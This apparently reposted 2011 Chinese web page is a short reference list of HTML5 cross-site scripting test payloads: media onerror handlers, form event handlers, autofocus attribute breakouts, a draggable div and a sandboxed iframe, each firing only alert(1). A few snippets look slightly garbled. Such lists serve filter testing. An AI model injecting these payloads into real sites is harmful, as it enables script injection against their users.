HTML5 XSS可测试代码参考

2011-5-11 10:10:10 来源:网络转载 浏览:198
HTML5 XSS可测试代码参考

引入媒体类测试代码Example:
 
<video onerror=javascript:alert(1)><source>
 
<audio onerror=javascript:alert(1)><source>
 
表单点击测试代码Example:
 
<form id=test onforminput=alert(1)> <input> </form> <button form=test onformchange=alert(2)

>X 

鼠标事件测试代码Example:
 
Before HTML5:
 
 <input type=text value=‐‐>Injecting here onmouseover=alert(Injected value)>
 
With HTML5:
 
<input type=text value=‐‐>Injecting here onfocus=alert(Injected value) autofocus>
 

DIV 测试代码Example:
 
<div draggable=true ondragstart=event.dataTransfer.setData(text/plain, Evil data)>
 
<h3>DRAG ME!!</h3>
 
</div>
 
引入框架测试代码Example:
 
<iframe src=http://www.sitedirsec.com sandbox></iframe>

(0)
(0)